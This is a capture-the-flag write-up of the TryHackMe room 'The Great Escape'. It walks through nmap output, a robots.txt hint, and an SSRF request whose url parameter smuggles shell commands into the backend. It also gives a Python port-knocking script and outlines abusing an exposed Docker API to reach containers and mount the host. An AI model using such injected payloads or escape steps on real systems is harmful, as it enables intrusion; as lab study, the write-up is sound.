7.2 KiB
TryHackMe-The Great Escape
NMAP
nmap -sC -sV 10.10.108.159
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-15 16:17 PKT
Stats: 0:02:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 16:21 (0:02:05 remaining)
Stats: 0:02:13 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 16:22 (0:02:10 remaining)
Nmap scan report for 10.10.108.159
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh?
| fingerprint-strings:
| GenericLines:
|_ uT9UNaD!^xFWU'tGL'-@"d2gE"Xd
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http nginx 1.19.6
| http-robots.txt: 3 disallowed entries
|_/api/ /exif-util /*.bak.txt$
|_http-server-header: nginx/1.19.6
|_http-title: docker-escape-nuxt
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.80%I=7%D=2/15%Time=602A5867%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,1F,"uT9UNaD!\^xFWU'tGL\\'-@\"d2gE\"Xd\r\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 195.11 seconds
PORT 80 (HTTP)
From the nmap scan we see 3 disallowed entries
The first entry which is /api/ gives 503 which we get when a server is currently unable to handle the request due to a temporary overloading or maintenance of the server.
The second entry invloves uploading a image file
And for the third I didn't know how to access /\*.bak.txt$
Dirsearch
For fuzzing I used dirsearch but I was getting a lot of 503 status codes
But I did saw /api/ which was having 301 status code with a length of 169 bytes
I also ran nikto and it found some cert and archive files but they were also giving 503 errors
So there is some WAF (Web Application Firewall) that is implemented that we need to bypass so here automated tools may not work .
For the web flag I looked at the hint which said about a "well-known file", I though about robots.txt , the javascript file but it was a dead end so started to guess it and eventually got there
It says to make a request with a HEAD
Going back to robots.txt I tried to combine two disallowed entries and got to somewhere
If we focus on this part
We can see that it's pointing at /exif and has a parameter url
We can do LFI now , since it's a docker container you can tell as there aren't any usernames so we'll directly go /root/ directory
Reading the dev-note.txt
So we got the password but not sure if it's for hydra. Visiting the /root/.git/ folder
I used this command to search for files
http://10.10.176.126/api/exif?url=http://api-dev-backup:8080/exif?url=;cd%20/root/.git/;pwd;ls%20-la%20objects
And found objects which could be recovered using git show <object>
a3d30a7d0510dc6565ff9316e3fb84434916dee8
3f5e51190a2c8e2a4ea226e7c004ff656148a168
4530ff7f56b215fa9fe76c4d7cc1319960c4e539
4b825dc642cb6eb9a060e54bf8d69288fbee4904
5242825dfd6b96819f65d17a1c31a99fea4ffb6a
89dcd015496baca7521df9a07de050c37cb3d4ba
aae81292b0aeb73d28ce77dd3078470897151cd8
efadf5b5aa6d0b3bd434c0437be8559edef2a52e
fc326ab9338571dfeb64c00f4b9d85c09d557828
These were the objects I gathered by going back and forth
We get a flag but it was invalid also got some ports to knock .So I did a simple port knock through a tool we can install
https://www.howtogeek.com/442733/how-to-use-port-knocking-on-linux-and-why-you-shouldnt/
But this method failed so I looked for scripts on github and found one and modified a little to add some more arguments for ports
#!/usr/bin/python
import sys
from socket import *
from itertools import permutations
if len(sys.argv) < 5:
print "---------------------------------------------"
print " Port Knocker "
print "Usage: python knock.py <ip> <p1> <p2> <p3> "
print "Ex: python knock.py 192.168.209.130 1 2 3 "
print "---------------------------------------------"
sys.exit(0)
host = sys.argv[1]
ports = permutations([int(sys.argv[2]), int(sys.argv[3]), int(sys.argv[4]),int(sys.argv[5]),int(sys.argv[6])])
def Knockports(ports):
for port in ports:
try:
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(0.1)
s.connect_ex((host, port))
s.close()
print "Knocked on port " + str(port)
except Exception, e:
print "Error: " + str(e)
for combination in list(ports):
print "Testing permutation: " + str(combination)
Knockports(combination)
Then ran the python2 script
Doing a nmap scan we can see that docker port is open now
After that I visited the hacktricks tried to run some commands but wasn't able to do anything and kept failing. But this blog saved me from quiting on this room
https://www.hackingarticles.in/docker-for-pentester-abusing-docker-api/
First I tried to view the images then tried connecting to them but since they were not running I used ps -a to see which images were running and saw conatiner ID 49fe455a9681 was running so I was able to connect with it
But this container didn't had any intersting stuff so connected to another one which was running on port 8080 of that image
Then switched to another container
Gathering the objects from before I used git cat-file -p <object_file_name>
This was the second flag
Now I tried to look for docker breakouts, exploits,capabilites but nothing seemed to work and I was getting the feeling that this is a huge rabbit hole. So going back to seeing docker images I saw alpine at the bottom and gave a shot to mount it
This is box was a lot difficult because there was a prize for this box the one's who completed it within 3 days will be added to the raffle and I completed this box after 2 days so hopefully I'll win a prize with that we can all the flag.